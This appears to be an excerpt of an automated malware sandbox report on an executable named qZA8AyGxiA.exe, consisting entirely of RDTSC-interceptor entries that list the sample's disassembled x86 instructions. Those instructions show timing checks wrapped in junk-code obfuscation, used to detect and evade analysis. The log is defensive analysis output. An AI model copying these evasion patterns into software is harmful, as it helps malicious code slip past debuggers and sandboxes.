Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72808C7 second address: 72808D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72808D7 second address: 72808DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72808DB second address: 7280916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FC728ECBE17h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC728ECBE15h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7280916 second address: 728091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 728091C second address: 7280920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260036 second address: 7260068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC7292A9B16h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push esi 0x00000013 mov ax, bx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260068 second address: 726006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726006C second address: 726007F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and esp, FFFFFFF0h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 mov esi, ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726007F second address: 7260092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260092 second address: 72600F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7292A9B16h 0x00000008 mov esi, 20D7ABE1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC7292A9B19h 0x0000001a sbb ch, 00000066h 0x0000001d jmp 00007FC7292A9B11h 0x00000022 popfd 0x00000023 jmp 00007FC7292A9B10h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72600F7 second address: 7260109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, AAh 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260109 second address: 726010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726010D second address: 7260113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260113 second address: 72601AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7292A9B19h 0x00000009 sbb ax, E7D6h 0x0000000e jmp 00007FC7292A9B11h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FC7292A9B13h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 mov eax, 6831AF4Bh 0x00000027 mov si, F527h 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007FC7292A9B0Dh 0x00000032 xchg eax, esi 0x00000033 jmp 00007FC7292A9B0Eh 0x00000038 xchg eax, edi 0x00000039 jmp 00007FC7292A9B10h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FC7292A9B0Eh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72601AC second address: 72601EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC728ECBE16h 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC728ECBE17h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72601EE second address: 72601F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72601F4 second address: 72601F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72601F8 second address: 726022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 jmp 00007FC7292A9B17h 0x00000015 lock bts dword ptr [edi], 00000000h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726022A second address: 7260245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260245 second address: 7260284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC79939BCD7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7292A9B18h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260284 second address: 7260288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260288 second address: 726028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726028E second address: 72602E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE0Ch 0x00000009 or cx, 8028h 0x0000000e jmp 00007FC728ECBE0Bh 0x00000013 popfd 0x00000014 jmp 00007FC728ECBE18h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d pushad 0x0000001e push esi 0x0000001f mov si, dx 0x00000022 pop edx 0x00000023 call 00007FC728ECBE16h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72602E9 second address: 7260317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 mov edx, 1E241900h 0x0000000d jmp 00007FC7292A9B19h 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7260317 second address: 726031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 726031B second address: 726032E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290837 second address: 7290861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, B077h 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov dx, DD5Ah 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FC728ECBE0Dh 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bh, ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290861 second address: 72908B3 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 1DFB10BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC7292A9B11h 0x00000010 adc ah, 00000036h 0x00000013 jmp 00007FC7292A9B11h 0x00000018 popfd 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7292A9B19h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72908B3 second address: 72908B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72908B9 second address: 72908BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72807EF second address: 72807F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72807F3 second address: 72807F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72807F9 second address: 7280808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7280808 second address: 728080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 728080C second address: 728084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC728ECBE10h 0x00000010 sbb ax, 6C68h 0x00000015 jmp 00007FC728ECBE0Bh 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC728ECBE0Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 728084F second address: 7280855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7280855 second address: 7280859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A63 second address: 7290A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A67 second address: 7290A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7290A6D second address: 7290B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov ax, bx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC7292A9B13h 0x00000012 sbb cx, D8FEh 0x00000017 jmp 00007FC7292A9B19h 0x0000001c popfd 0x0000001d mov ecx, 4F8B4147h 0x00000022 popad 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC7292A9B18h 0x0000002d sbb ax, FF28h 0x00000032 jmp 00007FC7292A9B0Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007FC7292A9B18h 0x0000003e adc ax, 3188h 0x00000043 jmp 00007FC7292A9B0Bh 0x00000048 popfd 0x00000049 popad 0x0000004a push dword ptr [ebp+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FC7292A9B15h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300AB6 second address: 7300ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300ABA second address: 7300AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300AD7 second address: 7300ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300ADC second address: 7300B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC7292A9B0Dh 0x0000000a adc si, 7756h 0x0000000f jmp 00007FC7292A9B11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FC7292A9B11h 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FC7292A9B0Eh 0x00000024 mov ebp, esp 0x00000026 jmp 00007FC7292A9B10h 0x0000002b mov dl, byte ptr [ebp+14h] 0x0000002e pushad 0x0000002f jmp 00007FC7292A9B0Eh 0x00000034 movzx eax, bx 0x00000037 popad 0x00000038 mov eax, dword ptr [ebp+10h] 0x0000003b pushad 0x0000003c mov ebx, 7320669Eh 0x00000041 push eax 0x00000042 push edx 0x00000043 mov ebx, 294A9E38h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300B61 second address: 7300BA4 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 5E2765E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a and dl, 00000007h 0x0000000d jmp 00007FC728ECBE13h 0x00000012 test eax, eax 0x00000014 jmp 00007FC728ECBE16h 0x00000019 je 00007FC798F4145Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BA4 second address: 7300BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BAA second address: 7300BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BAF second address: 7300BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 99h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BD1 second address: 7300BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BD7 second address: 7300BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BDB second address: 7300BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ecx 0x0000000c pushad 0x0000000d mov ax, D35Dh 0x00000011 popad 0x00000012 shr eax, 1 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cl, bh 0x00000019 mov ebx, ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300BFC second address: 7300C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300C12 second address: 7300AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC798F413BDh 0x0000000d jne 00007FC728ECBDFDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007FC728ECBDFDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007FC728EDC2FDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007FC728ECBE17h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007FC728ECBE08h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007FC728ECBE0Eh 0x00000051 xchg eax, ebp 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72E0DBB second address: 72E0E1A instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC7292A9B15h 0x0000000d adc ah, FFFFFFD6h 0x00000010 jmp 00007FC7292A9B11h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, si 0x0000001e pushfd 0x0000001f jmp 00007FC7292A9B14h 0x00000024 add cl, 00000028h 0x00000027 jmp 00007FC7292A9B0Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72E0E1A second address: 72E0E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FC728ECBE0Ch 0x00000011 mov ax, C691h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop eax 0x0000001c mov ch, dh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0450 second address: 72F0456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0456 second address: 72F04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC728ECBE0Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 pushfd 0x00000014 jmp 00007FC728ECBE10h 0x00000019 and cx, 64B8h 0x0000001e jmp 00007FC728ECBE0Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04A3 second address: 72F04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04A7 second address: 72F04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04C2 second address: 72F050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007FC7292A9B0Bh 0x0000000b or cx, FBDEh 0x00000010 jmp 00007FC7292A9B19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 mov ax, 4331h 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F050F second address: 72F0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0515 second address: 72F0547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c call 00007FC7292A9B0Bh 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 mov bx, si 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC7292A9B0Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0547 second address: 72F054D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F054D second address: 72F0566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0566 second address: 72F056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F056C second address: 72F05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC7292A9B16h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007FC7292A9B10h 0x00000017 sub ecx, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F05B9 second address: 72F05CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F05CB second address: 72F0668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FC7292A9B0Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007FC7292A9B10h 0x00000016 mov eax, 00000001h 0x0000001b pushad 0x0000001c push esi 0x0000001d mov dl, 01h 0x0000001f pop eax 0x00000020 mov di, 12EAh 0x00000024 popad 0x00000025 lock cmpxchg dword ptr [esi], ecx 0x00000029 pushad 0x0000002a pushad 0x0000002b mov dl, 82h 0x0000002d pushfd 0x0000002e jmp 00007FC7292A9B16h 0x00000033 xor ch, FFFFFFD8h 0x00000036 jmp 00007FC7292A9B0Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov cx, 398Fh 0x00000041 popad 0x00000042 mov ecx, eax 0x00000044 pushad 0x00000045 mov ah, CBh 0x00000047 mov bx, 0E20h 0x0000004b popad 0x0000004c cmp ecx, 01h 0x0000004f pushad 0x00000050 mov di, 8138h 0x00000054 call 00007FC7292A9B11h 0x00000059 mov bh, cl 0x0000005b pop edx 0x0000005c popad 0x0000005d jne 00007FC79930BA77h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0668 second address: 72F06AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC728ECBE12h 0x0000000f and si, 25F8h 0x00000014 jmp 00007FC728ECBE0Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, cx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
